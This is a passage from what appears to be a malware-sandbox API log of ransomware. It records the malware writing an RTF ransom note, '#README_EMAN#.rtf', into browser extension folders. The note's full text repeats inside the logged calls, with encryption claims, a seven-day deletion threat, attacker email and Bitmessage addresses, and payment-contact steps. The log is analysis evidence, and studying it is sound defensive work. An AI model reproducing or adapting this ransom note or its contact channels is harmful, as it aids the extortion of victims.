COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.258] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.259] CloseHandle (hObject=0x2e8) returned 1 [0285.259] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\#readme_eman#.rtf")) returned 0x20 [0285.259] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\#readme_eman#.rtf")) returned 0xffffffff [0285.259] GetLastError () returned 0x2 [0285.259] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0285.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 